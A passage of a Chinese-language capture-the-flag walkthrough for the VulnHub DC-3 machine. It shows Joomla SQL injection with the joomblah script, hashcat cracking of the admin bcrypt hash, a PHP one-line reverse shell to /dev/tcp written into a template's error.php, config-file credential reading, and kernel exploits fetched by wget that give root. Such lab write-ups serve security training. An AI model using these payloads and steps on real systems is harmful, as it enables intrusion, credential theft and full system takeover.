| #__viewlevels       |
+---------------------+

[15:10:47] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 93 times
[15:10:47] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'                                                                               

[*] ending @ 15:10:47 /2023-05-31/

我们可以发现可以把joomladb中的表给查出来。

但是如果此时你开开心心的想着去查#__users表中的列名你就会发现，根本查不出来。为什么呢？原因在于joomla配置文件里可以设置数据库中表名前面带有一个固定的前缀，所以实际上表名应该是Setprefix_users，然而我们看不到配置文件，显然猜不出来管理员到底设置了什么前缀。所以这条路只能作罢。

Joomblah

其实joomla有专门的漏洞利用脚本：joomblah 我们可以直接用这个脚本来对joomla进行利用。

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ python3 joomblah.py http://192.168.56.111 
                                                                                                                                                                                          
    .---.    .-'''-.        .-'''-.                                         
    |   |   '   _    \     '   _    \                            .---.       
    '---' /   /` '.   \  /   /` '.   \  __  __   ___   /|        |   |            .                                                                       
    .---..   |     \  ' .   |     \  ' |  |/  `.'   `. ||        |   |          .'|                                                                       
    |   ||   '      |  '|   '      |  '|   .-.  .-.   '||        |   |         <  |                                                                       
    |   |\    \     / / \    \     / / |  |  |  |  |  |||  __    |   |    __    | |                                                                       
    |   | `.   ` ..' /   `.   ` ..' /  |  |  |  |  |  |||/'__ '. |   | .:--.'.  | | .'''-.                                                             
    |   |    '-...-'`       '-...-'`   |  |  |  |  |  ||:/`  '. '|   |/ |   \ | | |/.'''. \                                                             
    |   |                              |  |  |  |  |  |||     | ||   |`" __ | | |  /    | |                                                             
    |   |                              |__|  |__|  |__|||\    / '|   | .'.''| | | |     | |                                                         
 __.'   '                                              |/'..' / '---'/ /   | |_| |     | |   
|      '                                               '  `'-'`       \ \._,\ '/| '.    | '.                                                         
|____.'                                                                `--'  `" '---'   '---'                                                                                             

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: d8uea_users
  -  Found table: users
  -  Extracting users from d8uea_users
 [$] Found user ['629', 'admin', 'admin', 'freddy@norealaddress.net', '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu', '', '']
  -  Extracting sessions from d8uea_session
  -  Extracting users from users
  -  Extracting sessions from session
                                     

从这里我们可以发现原来管理员将前缀设置为d8uea了。当然，最重要的是我们拿到了admin用户的密码哈希$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

破解哈希值

$2开头的多半是bcrypt。丢到在线破解网站上尝试没有破解出来。那就本地试试吧。

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ hashcat -O -a 0 -m 3200 '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz, 2913/5890 MB (1024 MB allocatable), 8MCU

Kernel /usr/share/hashcat/OpenCL/m03200-optimized.cl:
Optimized kernel requested, but not available or not required
Falling back to pure kernel

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu:snoopy
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0...lfB1Zu
Time.Started.....: Wed May 31 15:35:40 2023 (3 secs)
Time.Estimated...: Wed May 31 15:35:43 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       85 H/s (7.63ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 192/14344385 (0.00%)
Rejected.........: 0/192 (0.00%)
Restore.Point....: 128/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Candidate.Engine.: Device Generator
Candidates.#1....: carolina -> november
Hardware.Mon.#1..: Util: 87%

Started: Wed May 31 15:34:50 2023
Stopped: Wed May 31 15:35:45 2023

解释一下hashcat里的一些参数：-O表示使用Optimized kernel（这台机子实际上不支持）， -a 0代表使用字典攻击， -m 3200代表哈希类型是bcrypt(3200)。

发现秒破解出来登录凭证:admin:snoopy

成功登录后台。（后台地址之前扫描就扫出来了：http://192.168.56.111/administrator/）

后台get shell

如果对joomla这套CMS比较熟的话可以直奔顶栏Extensions导航到templates

然后我们直接选择当前使用的模版protostar

向error.php页面写入我们的反弹shell。（向404页面写入的好处在于不用精确定位写入页面在哪，瞎输一个不存在的页面就行）

简简单单插个一句话<?php system("/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.144/443 0>&1'"); ?>

成功拿shell

┌──(kali㉿kali)-[~/vulnhub/DC/3/workSpace]
└─$ sudo nc -lvp 443                      
listening on [any] 443 ...
192.168.56.111: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.144] from (UNKNOWN) [192.168.56.111] 33186
bash: cannot set terminal process group (1183): Inappropriate ioctl for device
bash: no job control in this shell
www-data@DC-3:/var/www/html$ 

提权

手动枚举

www-data@DC-3:/var/www/html$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

如果比较有经验的话可以看出4.4.0-21-generic版本一般是存在可利用内核漏洞的，当然不知道可以直接searchsploit Linux kenerls 4.4查一下。但是显然提权第一选择不是内核漏洞，先看看别的吧。

www-data@DC-3:/var/www/html$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@DC-3:/var/www/html$ which python
which python
/usr/bin/python
www-data@DC-3:/var/www/html$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-3:/var/www/html$ sudo -l
sudo -l
[sudo] password for www-data: www-data

Sorry, try again.

www-data@DC-3:/home/dc3$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/bin/ping6
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/fusermount
/bin/mount
/bin/ping
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/at
www-data@DC-3:/home/dc3$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

sudo，suid和cron三件套没有值得注意的地方，当然cron没有详细列举具体cron脚本啥的。但是感觉不是很理想，先看看别的吧。

再看看网页的配置文件。

www-data@DC-3:/var/www/html$ cat configuration.php
cat configuration.php
<?php
class JConfig {
        public $offline = '0';
        public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
        public $display_offline_message = '1';
        public $offline_image = '';
        public $sitename = 'DC-3';
        public $editor = 'tinymce';
        public $captcha = '0';
        public $list_limit = '20';
        public $access = '1';
        public $debug = '0';
        public $debug_lang = '0';
        public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'root';
        public $password = 'squires';
        public $db = 'joomladb';
        public $dbprefix = 'd8uea_';
        public $live_site = '';
        public $secret = '7M6S1HqGMvt1JYkY';
        public $gzip = '0';
        public $error_reporting = 'default';
        public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
        public $ftp_host = '127.0.0.1';
        public $ftp_port = '21';
        public $ftp_user = '';
        public $ftp_pass = '';
        public $ftp_root = '';
        public $ftp_enable = '0';
        public $offset = 'UTC';
        public $mailonline = '1';
        public $mailer = 'mail';
        public $mailfrom = 'freddy@norealaddress.net';
        public $fromname = 'DC-3';
        public $sendmail = '/usr/sbin/sendmail';
        public $smtpauth = '0';
        public $smtpuser = '';
        public $smtppass = '';
        public $smtphost = 'localhost';
        public $smtpsecure = 'none';
        public $smtpport = '25';
        public $caching = '0';
        public $cache_handler = 'file';
        public $cachetime = '15';
        public $cache_platformprefix = '0';
        public $MetaDesc = 'A website for DC-3';
        public $MetaKeys = '';
        public $MetaTitle = '1';
        public $MetaAuthor = '1';
        public $MetaVersion = '0';
        public $robots = '';
        public $sef = '1';
        public $sef_rewrite = '0';
        public $sef_suffix = '0';
        public $unicodeslugs = '0';
        public $feed_limit = '10';
        public $feed_email = 'none';
        public $log_path = '/var/www/html/administrator/logs';
        public $tmp_path = '/var/www/html/tmp';
        public $lifetime = '15';
        public $session_handler = 'database';
        public $shared_session = '0';
}

发现数据库root用户的密码squires。先试试有没有大聪明密码复用（su），可惜都没有。再看看数据库是不是以root权限运行（ps aux | grep mysql），发现也不是。

登陆数据库看看有无信息。

www-data@DC-3:/home/dc3$ mysql -uroot -p
mysql -uroot -p
Enter password: squires

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3631
Server version: 5.7.25-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomladb           |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| columns_priv              |
| db                        |
| engine_cost               |
| event                     |
| func                      |
| general_log               |
| gtid_executed             |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| innodb_index_stats        |
| innodb_table_stats        |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| server_cost               |
| servers                   |
| slave_master_info         |
| slave_relay_log_info      |
| slave_worker_info         |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
31 rows in set (0.00 sec)

这里用\g是为了将结果旋转90度显示，方便我们查看列名，不旋转易读性很差。

mysql> select * from user\g;
select * from user\g;
+-----------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------------------------------+------------------+-----------------------+-------------------+----------------+
| Host      | User             | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin                | authentication_string                     | password_expired | password_last_changed | password_lifetime | account_locked |
+-----------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------------------------------+------------------+-----------------------+-------------------+----------------+
| localhost | root             | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          |            |             |              |             0 |           0 |               0 |                    0 | mysql_native_password | *BFD14C8A23EF160EED3D54E16D4F5311264D0963 | N                | 2019-03-23 19:31:20   |              NULL | N              |
| localhost | mysql.sys        | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                | N                | N              | N                   | N                  | N                | N          | N            | N                      |          |            |             |              |             0 |           0 |               0 |                    0 | mysql_native_password | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | N                | 2019-03-25 13:47:43   |              NULL | Y              |
| localhost | debian-sys-maint | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          |            |             |              |             0 |           0 |               0 |                    0 | mysql_native_password | *0640482736E7906211AEA47971B6C8478BA7DB4D | N                | 2019-03-23 19:16:41   |              NULL | N              |
| localhost | mysql.session    | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | Y          | N                     | N                | N            | N               | N                | N                | N              | N                   | N                  | N                | N          | N            | N                      |          |            |             |              |             0 |           0 |               0 |                    0 | mysql_native_password | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | N                | 2019-03-25 13:47:42   |              NULL | Y              |
+-----------+------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------------------------------+------------------+-----------------------+-------------------+----------------+
4 rows in set (0.00 sec)

ERROR: 
No query specified

我们对User,authentication_string这两个列比较感兴趣，查一下。

mysql> select User,authentication_string from user;
select User,authentication_string from user;
+------------------+-------------------------------------------+
| User             | authentication_string                     |
+------------------+-------------------------------------------+
| root             | *BFD14C8A23EF160EED3D54E16D4F5311264D0963 |
| mysql.sys        | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| debian-sys-maint | *0640482736E7906211AEA47971B6C8478BA7DB4D |
| mysql.session    | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
+------------------+-------------------------------------------+
4 rows in set (0.00 sec)

这里作者提示了THIS IS NOT AVALID PASSWORD THAT CAN BE USED HERE，说明是无关的信息。那就说明这条路也到头了。

内核提权

事已至此，手动列举没有发现什么quick win，那只能回归简单粗暴了。

先试试脏牛：

www-data@DC-3:/tmp/test$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
www-data@DC-3:/tmp/test$ ./dirty
./dirty
Please enter the new password: password

没反应了，看看虚拟机发现已经寄了。脏牛成功弄崩了。

所以说这就是不要第一步就内核提权的原因，很有可能把机子干趴了。

试了几个别的：40049.c,40839.c,40871.c,42033.txt,44300.c,45010.c都没成功。

直到试到了ebpf_mapfd_doubleput才成功。按照其说明操作即可（编译有warning也不影响）。

www-data@DC-3:/tmp/test$ wget 192.168.56.144:8000/exploit.tar
wget 192.168.56.144:8000/exploit.tar
--2023-05-31 19:14:40--  http://192.168.56.144:8000/exploit.tar
Connecting to 192.168.56.144:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-tar]
Saving to: 'exploit.tar'

     0K .......... ..........                                 100% 35.8M=0.001s

2023-05-31 19:14:40 (35.8 MB/s) - 'exploit.tar' saved [20480/20480]

www-data@DC-3:/tmp/test$ ls -la
ls -la
total 64
drwxr-xr-x 2 www-data www-data  4096 May 31 19:14 .
drwxrwxrwt 9 root     root      4096 May 31 19:09 ..
-rw-r--r-- 1 www-data www-data 13176 May 31 19:06 45010.c
-rwxr-xr-x 1 www-data www-data 16764 May 31 19:09 exp
-rw-r--r-- 1 www-data www-data 20480 Aug 16  2016 exploit.tar
www-data@DC-3:/tmp/test$ tar xvf exploi
tar xvf exploit.tar 
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC-3:/tmp/test$ ls
ls
45010.c
ebpf_mapfd_doubleput_exploit
exp
exploit.tar
www-data@DC-3:/tmp/test$ cd ebpf
cd ebpf_mapfd_doubleput_exploit/
www-data@DC-3:/tmp/test/ebpf_mapfd_doubleput_exploit$ ls -la
ls -la
total 28
drwxr-x--- 2 www-data www-data 4096 Apr 26  2016 .
drwxr-xr-x 3 www-data www-data 4096 May 31 19:14 ..
-rwxr-x--- 1 www-data www-data  155 Apr 26  2016 compile.sh
-rw-r----- 1 www-data www-data 4188 Apr 26  2016 doubleput.c
-rw-r----- 1 www-data www-data 2186 Apr 26  2016 hello.c
-rw-r----- 1 www-data www-data  255 Apr 26  2016 suidhelper.c
www-data@DC-3:/tmp/test/ebpf_mapfd_doubleput_exploit$ ./comp    
./compile.sh 
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
www-data@DC-3:/tmp/test/ebpf_mapfd_doubleput_exploit$ ls -la
ls -la
total 60
drwxr-x--- 2 www-data www-data  4096 May 31 19:15 .
drwxr-xr-x 3 www-data www-data  4096 May 31 19:14 ..
-rwxr-x--- 1 www-data www-data   155 Apr 26  2016 compile.sh
-rwxr-xr-x 1 www-data www-data 12336 May 31 19:15 doubleput
-rw-r----- 1 www-data www-data  4188 Apr 26  2016 doubleput.c
-rwxr-xr-x 1 www-data www-data  8028 May 31 19:15 hello
-rw-r----- 1 www-data www-data  2186 Apr 26  2016 hello.c
-rwxr-xr-x 1 www-data www-data  7524 May 31 19:15 suidhelper
-rw-r----- 1 www-data www-data   255 Apr 26  2016 suidhelper.c
www-data@DC-3:/tmp/test/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
whoami
root
cd /root
ls -la
total 28
drwx------  2 root root 4096 Apr 25  2020 .
drwxr-xr-x 22 root root 4096 Mar 23  2019 ..
-rw-------  1 root root 1202 Apr 25  2020 .bash_history
-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc
-rw-------  1 root root   71 Mar 23  2019 .mysql_history
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
-rw-------  1 root root    0 Apr 25  2020 .viminfo
-rw-r--r--  1 root root  604 Mar 26  2019 the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
                                                     

Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

成功提权。